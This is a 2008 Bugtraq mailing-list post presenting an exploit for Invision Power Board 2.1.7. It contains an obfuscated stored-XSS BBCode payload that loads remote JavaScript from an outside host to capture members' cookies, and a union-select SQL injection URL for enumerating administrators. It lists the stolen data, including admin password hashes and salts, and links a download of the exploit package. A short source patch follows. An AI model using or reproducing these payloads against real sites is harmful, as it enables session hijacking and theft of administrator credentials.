INVISION POWER BOARD 2.1.7 ACTIVE XSS/SQL INJECTION EXPLOIT

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: INVISION POWER BOARD 2.1.7 ACTIVE XSS/SQL INJECTION EXPLOIT
From: underwater@xxxxxxxxxxxx
Date: 5 Jan 2008 13:29:32 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

----[ INVISION POWER BOARD 2.1.7 EXPLOIT ... ITDefence.ru Antichat.ru ]

                                                INVISION POWER BOARD 2.1.7 
ACTIVE XSS/SQL INJECTION
                                                        Eugene Minaev 
underwater@xxxxxxxxxxxx
                                
___________________________________________________________________
                        ____/  __ __ _______________________ _______  
_______________    \  \   \
                        / .\  /  /_// //              /        \       \/      
__       \   /__/   /
                        / /     /_//              /\        /       /      /    
     /     /___/
                        \/        /              / /       /       /\     /     
    /         /
                        /        /               \/       /       / /    /      
   /__       //\
                        \       /    ____________/       /        \/    
__________// /__    // /   
                        /\\      \_______/        \________________/____/  2007 
   /_//_/   // //\
                        \ \\                                                    
           // // /
                        .\ \\        -[     ITDEFENCE.ru Security advisory     
]-         // // / . 
                        . 
\_\\________[________________________________________]_________//_//_/ . .
                 
                ----[ NITRO ... ]
                
                This vulnerability was already found before, but there was no 
available 
                public "figting" exploit for it. This POC consists of several 
parts - active xss generator, 
                JS-file, which will be caused at visiting page with xss, log 
viewer and special component,
                which will take necessary data from MySQL forum's tables in 
case if intercepted session
                belonged to the person with moderator privileges. 
                
                ----[ ANALYSIS ... ]
                
                XSS.php is one of the most important part of IPB 2.1.7 POC 
package, as it generates xss for 
                future injetion on the forum board. As the reference it is 
necessary to specify the full way 
                up to ya.js file (in which you have already preliminary 
corrected way on your own). Most likely 
                it is necessary only to press the button. 
                
                [img]http://www.ya.ru/[snapback]        
onerror=script=document.createElement(String.fromCharCode(115,99,114,
                
105,112,116)),script.src=/http:xxdaim.ruxmonzterxforum/.source.replace(/x/g,String.fromCharCode(47)),
                
head=document.getElementsByTagName(String.fromCharCode(104,101,97,100)).item(0),head.appendChild(script)
                style=visibility:hidden =[/snapback].gif[/img]
                
                The injection can be executed only when there is available 
session of the user with access 
                in moderator's panel.It is necessary to result "starter" 
parameter to numerical by means of "intval" 
                function.In case of successfull injection there is an 
oppotunity to enumerate forums' administrators team:
                
                
index.php?act=mod&f=-6&CODE=prune_finish&pergo=50&current=50&max=3&starter=1+union+select+1/*
                
                ----[ RECORD ... ]
                {
                
                        ---IP ADDRESS   sniffed ip address
                        ---REFERER              xssed theme
                        ---COOKIES              xssed cookies of forum member
                        ---USER ID              xssed user id of forum member
                        ---ADMIN NAME   admin username
                        ---ADMIN PASS   admin pass hash
                        ---ADMIN SALT   admin hash salt
                        
                }
                
                ----[ PATCH ... ]
                
                FILE 
                        sources/classes/bbcode/class_bbcode_core.php
                FUNCTION
                        regex_check_image
                LINE
                        924
                REPLACE
                        if ( preg_match( "/[?&;]/", $url) )
                ON
                        if ( preg_match( "/[?&;\<\[]/", $url) ) 
                        
                        
                FILE
                        sources/classes/bbcode/class_bbcode_core.php
                FUNCTION
                        post_db_parse_bbcode
                LINE
                        486
                REPLACE
                        preg_match_all( 
"#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );
                ON
                        preg_match_all( 
"#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match );

                        if ( $row['bbcode_tag'] == 'snapback' )
                        {       
                                $match[2][$i] = intval( $match[2][$i] );
                        }  
                        
                        
                
                www.underwater.itdefence.ru/isniff.rar

----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ]

Prev by Date: NetRisk 1.9.7 Remote File Inclusion Vulnerability
Next by Date: [SECURITY] [DSA 1449-1] New loop-aes-utils packages fix programming error
Previous by thread: NetRisk 1.9.7 Remote File Inclusion Vulnerability
Next by thread: [SECURITY] [DSA 1449-1] New loop-aes-utils packages fix programming error
Index(es):
- Date
- Thread